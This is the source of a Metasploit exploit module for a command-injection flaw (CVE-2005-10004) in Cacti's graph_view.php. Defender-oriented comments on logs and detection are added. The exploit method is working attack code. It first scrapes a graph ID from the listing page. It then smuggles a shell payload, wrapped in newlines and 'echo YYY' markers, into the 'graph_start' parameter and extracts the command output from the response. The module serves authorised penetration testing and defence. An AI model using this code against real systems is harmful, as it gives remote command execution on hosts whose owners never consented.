GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/unix/webapp/cacti_graphimage_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit exploit module for the command-execution flaw in the Raxnet Cacti
# 'graph_view.php' script (CVE-2005-10004). Per the module description, every
# Cacti release prior to 0.8.6-d is affected, so the remediation to verify
# after a finding is an upgrade to 0.8.6-d or later.
#
# Review notes for defenders:
# - Both requests are sent to the configured graph_view.php path with their
#   parameters in the query string, so web-server access logs are the natural
#   place to look for this traffic.
# - The second request carries a 'graph_start' value that begins and ends
#   with a newline and contains shell text between two 'echo YYY' markers.
#   NOTE(review): legitimate graph_start values are presumably numeric
#   timestamps -- confirm against the deployed Cacti version before turning
#   "non-numeric graph_start" into a detection rule.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient

  # Registers the module metadata and its single user-facing option.
  #
  # @param info [Hash] metadata supplied by the framework; merged with the
  #   values below through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Cacti graph_view.php Remote Command Execution',
        'Description' => %q{
          This module exploits an arbitrary command execution vulnerability in the
          Raxnet Cacti 'graph_view.php' script. All versions of Raxnet Cacti prior to
          0.8.6-d are vulnerable.
        },
        'Author' => [ 'David Maciejak <david.maciejak[at]kyxar.fr>', 'hdm' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2005-10004' ],
          [ 'OSVDB', '17539' ],
          [ 'BID', '14042' ],
        ],
        # The command runs with whatever account serves the web application,
        # not with elevated privileges.
        'Privileged' => false,
        'Payload' => {
          'DisableNops' => true,
          'Space' => 512,
          'Compat' => {
            'PayloadType' => 'cmd',
            'RequiredCmd' => 'generic perl ruby python telnet',
          }
        },
        'Platform' => 'unix',
        'Arch' => ARCH_CMD,
        'Targets' => [[ 'Automatic', {}]],
        'DisclosureDate' => '2005-01-15',
        'DefaultTarget' => 0,
        # All three values are the UNKNOWN_* placeholders: the module makes no
        # statement about crash risk, repeatability or artifacts left on the
        # host, so none of those should be assumed safe for production.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('URI', [true, "The full URI path to graph_view.php", "/cacti/graph_view.php"]),
      ]
    )
  end

  # Performs the two-request sequence: list the graphs to learn a graph ID,
  # then request that graph with the command placed in 'graph_start'.
  # Progress and any echoed command output are printed to the console.
  def exploit
    graph_view_path = normalize_uri(datastore['URI'])

    # Request 1 (10 s timeout): the listing page is only used as a source of
    # a graph ID that the server already knows about.
    listing = send_request_cgi(
      {
        'uri' => graph_view_path,
        'vars_get' => { 'action' => 'list' }
      },
      10
    )

    unless listing
      print_error("The server gave no response")
      return
    end

    # First 'local_graph_id=' value found in the page, up to the next '&'.
    graph_id = listing.body.match(/local_graph_id=(.*?)&/)
    unless graph_id
      print_error("Could not locate a valid image ID")
      return
    end

    # Request 2 (25 s timeout): the value is wrapped in newlines and the
    # command sits between two 'echo YYY' markers so that its output can be
    # picked out of the response body afterwards.
    reply = send_request_cgi(
      {
        'uri' => graph_view_path,
        'vars_get' => {
          'local_graph_id' => graph_id[1],
          'graph_start' => "\necho YYY;#{payload.encoded};echo YYY;echo\n"
        }
      },
      25
    )

    if reply
      print_status("The server returned: #{reply.code} #{reply.message}")
      print("")

      echoed = reply.body.match(/YYY(.*)YYY/)

      if echoed
        print_status("Command output from the server:")
        print(echoed[1])
      else
        # Heuristic only: a response without the marker pair is not proof
        # that the host is patched, so confirm the installed Cacti version
        # separately before closing a finding.
        print_status("This server may not be vulnerable")
      end
    else
      print_status("No response from the server")
    end
  end
end